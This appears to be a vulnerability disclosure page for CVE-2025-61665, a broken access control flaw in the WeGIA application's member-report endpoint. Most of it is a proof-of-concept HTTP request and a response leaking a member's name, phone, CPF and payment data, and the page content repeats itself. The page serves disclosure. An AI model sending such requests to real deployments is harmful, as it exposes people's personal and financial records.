CVE-2025-61665https://www.cvehunters.com/p/cve-2025-61665/Broken Access ControlCVE-2025-61665https://www.cvehunters.com/p/cve-2025-61665/https://www.cvehunters.com/p/cve-2025-61665/<h2 id="cve-2025-61665-broken-access-control-in-get_relatorios_sociosphp-endpoint">CVE-2025-61665: Broken Access Control in <code>get_relatorios_socios.php</code> Endpoint </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-61665" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-61665</a></strong></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A Broken Access Control vulnerability was identified in the <code>get_relatorios_socios.php</code> endpoint of the WeGIA application. This vulnerability allows unauthenticated attackers to directly access sensitive personal and financial information of members without requiring authentication or authorization.</p> <h2 id="details">Details </h2><p>Vulnerable Endpoint: <code>get_relatorios_socios.php</code></p> <p>Parameters: <code>tipo_socio</code>, <code>tipo_pessoa</code>, <code>operador</code>, <code>valor</code>, <code>tag</code>, <code>status</code></p> <h2 id="poc">PoC </h2><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">GET /WeGIA/html/socio/sistema/get_relatorios_socios.php?tipo_socio=x&tipo_pessoa=x&operador=maior_q&valor=&tag=x&status=x HTTP/1.1 </span></span><span class="line"><span class="cl">Host: sec.wegia.org:8000 </span></span><span class="line"><span class="cl">User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0 </span></span><span class="line"><span class="cl">Accept: */* </span></span><span class="line"><span class="cl">Accept-Language: en-US,en;q=0.5 </span></span><span class="line"><span class="cl">Accept-Encoding: gzip, deflate, br, zstd </span></span><span class="line"><span class="cl">X-Requested-With: XMLHttpRequest </span></span><span class="line"><span class="cl">Connection: keep-alive </span></span><span class="line"><span class="cl">Referer: https://sec.wegia.org:8000/WeGIA/html/socio/sistema/relatorios_socios.php </span></span><span class="line"><span class="cl">Cookie: _ga_F8DXBXLV8J=GS2.1.s1756605228$o47$g1$t1756611307$j47$l0$h0; _ga=GA1.1.424189364.1749063834 </span></span><span class="line"><span class="cl">Sec-Fetch-Dest: empty </span></span><span class="line"><span class="cl">Sec-Fetch-Mode: cors </span></span><span class="line"><span class="cl">Sec-Fetch-Site: same-origin </span></span><span class="line"><span class="cl">Priority: u=0 </span></span></code></pre></td></tr></table> </div> </div><h3 id="response-snippet">Response (snippet): </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">HTTP/1.1 200 OK </span></span><span class="line"><span class="cl">Date: Sun, 31 Aug 2025 20:00:43 GMT </span></span><span class="line"><span class="cl">Server: Apache/2.4.62 (Debian) </span></span><span class="line"><span class="cl">Vary: Accept-Encoding </span></span><span class="line"><span class="cl">Content-Length: 204 </span></span><span class="line"><span class="cl">Keep-Alive: timeout=5, max=100 </span></span><span class="line"><span class="cl">Connection: Keep-Alive </span></span><span class="line"><span class="cl">Content-Type: text/html; charset=UTF-8 </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">[{ </span></span><span class="line"><span class="cl"> "nome": "Luis Barango", </span></span><span class="line"><span class="cl"> "telefone": "(71)98642-1278", </span></span><span class="line"><span class="cl"> "cpf": "649.659.320-56", </span></span><span class="line"><span class="cl"> "valor_periodo": "5000.00", </span></span><span class="line"><span class="cl"> "email": "teste@teste.com", </span></span><span class="line"><span class="cl"> "tipo": "F\u00edsica - Mensal - Boleto", </span></span><span class="line"><span class="cl"> "status": "Ativo", </span></span><span class="line"><span class="cl"> "tag": "Solicitante" </span></span><span class="line"><span class="cl">}] </span></span></code></pre></td></tr></table> </div> </div><p><img src="/p/cve-2025-61665/image.png" width="1534" height="431" srcset="/p/cve-2025-61665/image_hu_14ad2691788bd7c6.png 480w, /p/cve-2025-61665/image_hu_16f20d6fda007cbd.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="355" data-flex-basis="854px" ></p><h2 id="cve-2025-61665-broken-access-control-in-get_relatorios_sociosphp-endpoint">CVE-2025-61665: Broken Access Control in <code>get_relatorios_socios.php</code> Endpoint </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-61665" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-61665</a></strong></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A Broken Access Control vulnerability was identified in the <code>get_relatorios_socios.php</code> endpoint of the WeGIA application. This vulnerability allows unauthenticated attackers to directly access sensitive personal and financial information of members without requiring authentication or authorization.</p> <h2 id="details">Details </h2><p>Vulnerable Endpoint: <code>get_relatorios_socios.php</code></p> <p>Parameters: <code>tipo_socio</code>, <code>tipo_pessoa</code>, <code>operador</code>, <code>valor</code>, <code>tag</code>, <code>status</code></p> <h2 id="poc">PoC </h2><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">GET /WeGIA/html/socio/sistema/get_relatorios_socios.php?tipo_socio=x&tipo_pessoa=x&operador=maior_q&valor=&tag=x&status=x HTTP/1.1 </span></span><span class="line"><span class="cl">Host: sec.wegia.org:8000 </span></span><span class="line"><span class="cl">User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0 </span></span><span class="line"><span class="cl">Accept: */* </span></span><span class="line"><span class="cl">Accept-Language: en-US,en;q=0.5 </span></span><span class="line"><span class="cl">Accept-Encoding: gzip, deflate, br, zstd </span></span><span class="line"><span class="cl">X-Requested-With: XMLHttpRequest </span></span><span class="line"><span class="cl">Connection: keep-alive </span></span><span class="line"><span class="cl">Referer: https://sec.wegia.org:8000/WeGIA/html/socio/sistema/relatorios_socios.php </span></span><span class="line"><span class="cl">Cookie: _ga_F8DXBXLV8J=GS2.1.s1756605228$o47$g1$t1756611307$j47$l0$h0; _ga=GA1.1.424189364.1749063834 </span></span><span class="line"><span class="cl">Sec-Fetch-Dest: empty </span></span><span class="line"><span class="cl">Sec-Fetch-Mode: cors </span></span><span class="line"><span class="cl">Sec-Fetch-Site: same-origin </span></span><span class="line"><span class="cl">Priority: u=0 </span></span></code></pre></td></tr></table> </div> </div><h3 id="response-snippet">Response (snippet): </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">HTTP/1.1 200 OK </span></span><span class="line"><span class="cl">Date: Sun, 31 Aug 2025 20:00:43 GMT </span></span><span class="line"><span class="cl">Server: Apache/2.4.62 (Debian) </span></span><span class="line"><span class="cl">Vary: Accept-Encoding </span></span><span class="line"><span class="cl">Content-Length: 204 </span></span><span class="line"><span class="cl">Keep-Alive: timeout=5, max=100 </span></span><span class="line"><span class="cl">Connection: Keep-Alive </span></span><span class="line"><span class="cl">Content-Type: text/html; charset=UTF-8 </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">[{ </span></span><span class="line"><span class="cl"> "nome": "Luis Barango", </span></span><span class="line"><span class="cl"> "telefone": "(71)98642-1278", </span></span><span class="line"><span class="cl"> "cpf": "649.659.320-56", </span></span><span class="line"><span class="cl"> "valor_periodo": "5000.00", </span></span><span class="line"><span class="cl"> "email": "teste@teste.com", </span></span><span class="line"><span class="cl"> "tipo": "F\u00edsica - Mensal - Boleto", </span></span><span class="line"><span class="cl"> "status": "Ativo", </span></span><span class="line"><span class="cl"> "tag": "Solicitante" </span></span><span class="line"><span class="cl">}] </span></span></code></pre></td></tr></table> </div> </div><p><img src="/p/cve-2025-61665/image.png" width="1534" height="431" srcset="/p/cve-2025-61665/image_hu_14ad2691788bd7c6.png 480w, /p/cve-2025-61665/image_hu_16f20d6fda007cbd.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="355" data-flex-basis="854px" /></p> <h2 id="impact">Impact </h2><p style="text-align: justify;">Broken Access Control vulnerabilities can have severe consequences, including: <ul> <li>Unauthorized access to restricted functionality;</li> <li>Escalation of privileges for low-level users;</li> <li>Exposure of sensitive data and potential system compromise;</li> <li>Loss of confidentiality and integrity of educational records;</li> <li>Reputational damage to the organization.</li> </ul> </p> <h2 id="reference">Reference </h2><p><em><strong><a class="link" href="https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-62wp-6qmh-6p5f" target="_blank" rel="noopener" >https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-62wp-6qmh-6p5f</a></strong></em></p> <h2 id="finder">Finder </h2><p><a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/marcelo50x50.png" loading="lazy" /></a> <a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" >Marcelo Queiroz</a></p> <blockquote> <p><em><strong>By: <a class="link" href="https://github.com/CVE-Hunters/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></strong></em></p> </blockquote>Tue, 30 Sep 2025 00:00:00 +0000